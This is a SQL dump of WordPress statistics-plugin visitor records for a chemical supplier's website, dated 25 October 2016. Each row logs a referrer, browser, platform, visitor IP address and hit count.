INSERT INTO `wp_statistics_visitor` VALUES (11600, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwixo8mAsvbPAhXB2yYKHYr5BlAQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136593572,d.eWE', 'MSIE', 'Windows', '11.0', '', '199.36.17.2', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11601, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11602, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.67.190.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11603, '2016-10-25', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '63.131.77.110', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11604, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.117.134.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11605, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '192.42.246.253', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11606, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0ahUKEwj8_MugtPbPAhWLcT4KHc_wDeoQgU8IQjAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '199.46.251.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11607, '2016-10-25', 'https://www.google.co.in/', 'Chrome', 'Android', '38.0.1025.166', '', '101.222.162.0', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11608, '2016-10-25', 'https://www.miller-stephenson.com', 'curl', 'Linux', '7.15.5', '', '202.65.141.245', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11609, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.140.78.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11610, '2016-10-25', 'https://www.google.com/search?ei=uN8OWJWlMIeNsAHOoKC4DA&q=what+properties+of+polymers+can+be+based+on+for+measuring+the+molecular+weight%3F&oq=what+properties+of+polymers+can+be+based+on+for+measuring+the+molecular+weight%3F&gs_l=mobile-gws-serp.12...15026.15026.0.16387.1.1.0.0.0.0.513.513.5-1.1.0....0...1.1.64.mobile-gws-serp..0.0.0.seBeSg-P6ck', 'Chrome', 'Android', '34.0.1847.76', '', '178.79.132.148', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11611, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '64.60.197.211', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11612, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.231.163.24', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11613, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjl3Z-WtvbPAhWMOSYKHTbUAzsQjBAIKDAC&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2F&usg=AFQjCNG9rxN-loo47flpbq4TFJUAtJ1HDg&bvm=bv.136593572,d.eWE', 'MSIE', 'Windows', '11.0', '', '199.29.132.2', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11614, '2016-10-25', 'https://www.bing.com/search?q=miller+stephenson&src=IE-SearchBox&FORM=IESR02', 'MSIE', 'Windows', '11.0', '', '204.128.192.33', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11615, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.153.155.239', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11616, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11617, '2016-10-25', 'https://search.myway.com/search/GGmain.jhtml?p2=%5EBA5%5Exdm133%5ETTAB02%5Eus&ptb=50B9C6C3-5E30-4F49-8A91-FEFF9F02E028&n=C04479B&ind=&tpr=hpsb&trs=wtt&cn=us&ln=en&si=245051_Work-OMF-newstuff&brwsid=7693274e-518f-4c23-819b-013fd915e028&searchfor=miller%20stephenson&st=tab', 'MSIE', 'Windows', '11.0', '', '75.151.243.201', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11618, '2016-10-25', 'https://www.bing.com/search?q=miller+stephenson+chemical+co+inc&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '132.119.253.2', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11619, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11620, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.139.15.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11621, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.87.146.55', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11622, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.175', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11623, '2016-10-25', 'https://www.google.az/', 'Chrome', 'Windows', '53.0.2785.143', '', '5.197.230.43', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11624, '2016-10-25', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '75.146.128.149', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11625, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '84.244.60.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11626, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '70.32.51.26', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11627, '2016-10-25', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '134.9.207.64', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11628, '2016-10-25', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '12.118.209.222', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11629, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11630, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11631, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '175.197.148.112', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11632, '2016-10-25', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11633, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '107.194.227.91', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11634, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.234.93.232', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11635, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '138.115.118.32', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11636, '2016-10-25', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiy6LOSv_bPAhWNG4EKHclfAAkYABAA&sig=AOD64_2H2pX9ZnRxAoywRqWWsxHfIz3WxA&rct=j&q=&ved=0ahUKEwjwwbCSv_bPAhXMZiYKHdsZCXcQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '192.107.246.16', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11637, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '98.102.3.170', '000', 40, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11638, '2016-10-25', 'https://www.miller-stephenson.com/tech-support/sds/', 'MSIE', 'Windows', '9.0', '', '182.118.20.217', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11639, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.254.110.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11640, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '24.63.154.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11641, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '130.207.141.188', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11642, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.146.160.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11643, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.138.115.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11644, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '96.39.11.146', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11645, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '166.137.126.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11646, '2016-10-25', 'https://www.google.com/aclk?sa=L&ai=DChcSEwji1br1wfbPAhWGYX4KHTO6AegYABAA&sig=AOD64_1395GyVUqAzEaVG0y-_cOhGt5WZQ&rct=j&q=&ved=0ahUKEwjR1bb1wfbPAhWG1IMKHYNHCwAQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '166.20.224.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11647, '2016-10-25', 'https://www.google.es/', 'Safari', 'Macintosh', '10.0.1', '', '62.42.14.43', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11648, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '174.199.57.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11649, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.112', '', '119.6.239.56', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11650, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '65.128.67.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11651, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiQ6aH3w_bPAhXGRyYKHc4iDBAQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136593572,d.eWE', 'MSIE', 'Windows', '11.0', '', '138.162.0.42', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11652, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '138.162.0.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11653, '2016-10-25', 'https://www.miller-stephenson.com/epoxy-resin-conformal-coatings/', 'MSIE', 'Windows', '11.0', '', '138.162.0.43', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11654, '2016-10-25', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '128.115.190.33', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11655, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.134.71.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11656, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.193', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11657, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11658, '2016-10-25', 'https://search.aol.com/aol/search?s_chn=prt_dltitle-alwaysa-p&q=miller-stephenson+chemical+co&s_it=comsearch&s_qt=ac', 'MSIE', 'Windows', '11.0', '', '73.42.35.235', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11659, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.7', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11660, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj_wMu8xfbPAhWCJCYKHSasDLcQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136593572,d.eWE', 'MSIE', 'Windows', '11.0', '', '24.199.206.158', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11661, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.43.87.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11662, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.39.11.146', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11663, '2016-10-25', 'https://localhost:5272/067R154L115A10020140825.xhtml', 'SynHttpClient-Built', 'Unknown', '5867', '', '67.154.115.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11664, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '108.60.213.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11665, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.206.154.44', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11666, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '38.0.2125.102', '', '2.53.34.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11667, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '10.0.648.204', '', '198.240.69.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11668, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.106.202.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11669, '2016-10-25', 'https://www.miller-stephenson.com/product/ms-580582/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.201.11.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11670, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.43.87.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11671, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.103.170.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11672, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '151.16.242.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11673, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.164.244.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11674, '2016-10-25', 'https://www.miller-stephenson.com/miller/careers.html', 'MSIE', 'Windows', '9.0', '', '182.118.22.213', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11675, '2016-10-25', 'https://www.google.cl/', 'Chrome', 'Windows', '54.0.2840.71', '', '200.72.35.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11676, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.54.184.221', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11677, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwiHwN6CzPbPAhVBOSYKHaQqDwEQFggpMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fdry-film-ptfe-release-agent%2F&usg=AFQjCNGpwNBIBwX4PVWyGmdtXsBx9xJKjw&bvm=bv.136593572,d.eWE', 'MSIE', 'Windows', '11.0', '', '69.74.43.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11678, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.180.33.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11679, '2016-10-25', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '73.161.131.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11680, '2016-10-25', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '173.49.102.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11681, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiMhPiTzPbPAhUGND4KHZe5CL0QFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '64.140.231.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11682, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '70.209.135.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11683, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '70.199.5.84', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11684, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11685, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.172.59.84', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11686, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '167.115.115.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11687, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.40.240.226', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11688, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '32.217.34.56', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11689, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '173.200.78.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11690, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '204.62.140.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11691, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0.1', '', '66.18.166.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11692, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '132.246.232.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11693, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '108.183.28.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11694, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.25.229', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11695, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '50.0.2661.102', '', '66.171.192.134', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11696, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '67.45.112.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11697, '2016-10-25', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '67.45.112.38', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11698, '2016-10-25', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj5ptr11fbPAhWCMXIKHQDhBaMYABAA&ei=9q8PWMCUCYGusQHOr7jIBg&sig=AOD64_3oQXd1_nhQ-D4SLSkndjA9w0tzTw&rct=j&q=&sqi=2&ved=0ahUKEwjA59b11fbPAhUBVywKHc4XDmkQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '12.49.250.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11699, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11700, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.143.73.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11701, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '202.65.158.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11702, '2016-10-25', 'https://pharmacyincity.com/', 'MSIE', 'Windows', '5.5', '', '178.137.95.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11703, '2016-10-25', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.1', '', '80.128.111.116', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11704, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '50.246.28.185', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11705, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11706, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11707, '2016-10-25', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '206.210.107.170', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11708, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '21.0', '', '46.229.173.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11709, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.82', '', '199.254.206.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11710, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '209.6.175.242', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11711, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.7', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11712, '2016-10-25', 'https://www.google.com.mx/', 'Chrome', 'Windows', '53.0.2785.143', '', '201.172.66.127', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11713, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '190.148.255.148', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11714, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjtiPaO3fbPAhVLBSwKHXoIDy4QFghbMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-205%2F&usg=AFQjCNHwZ2VkQ2EkLZn-9yjL6I2BINcdgA', 'MSIE', 'Windows', '11.0', '', '57.97.119.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11715, '2016-10-25', 'https://www.miller-stephenson.com/product/krytox-gpl-205/', 'MSIE', 'Windows', '11.0', '', '57.97.119.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11716, '2016-10-25', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjQo_fG3fbPAhWIPIEKHT5CDfQYABAA&sig=AOD64_0Q2vMyjZs8Em7lyVa9rOTYzZOqGA&rct=j&frm=1&q=&ved=0ahUKEwiHlvPG3fbPAhXKaD4KHZqJB7AQ0QwIGg&adurl=', 'MSIE', 'Windows', '10.0', '', '192.139.132.23', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11717, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.0', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11718, '2016-10-25', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '207.164.187.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11719, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.244.202.81', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11720, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11.9600.18499', '', '173.167.26.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11721, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '69.18.37.6', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11722, '2016-10-25', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 32, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11723, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '39.0.2171.95', '', '50.22.90.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11724, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.101', '', '192.241.239.223', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11725, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '27.0.1453', '', '192.241.239.223', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11726, '2016-10-25', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '180.153.236.173', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11727, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.124.154.97', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11728, '2016-10-25', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.2', '', '74.83.78.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11729, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Android', '54.0.2840.68', '', '75.101.31.251', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11730, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '208.115.154.201', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11731, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '201.206.67.91', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11732, '2016-10-25', 'https://www.mschem.com/miller/pdf/MS-720,%20722.pdf', 'Chrome', 'Windows', '54.0.2840.71', '', '73.164.253.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11733, '2016-10-25', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '68.197.4.72', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11734, '2016-10-25', 'https://www.google.com.pe/', 'Chrome', 'Windows', '53.0.2785.143', '', '181.224.236.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11735, '2016-10-25', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.1', '', '47.144.142.179', '000', 3, 0); 
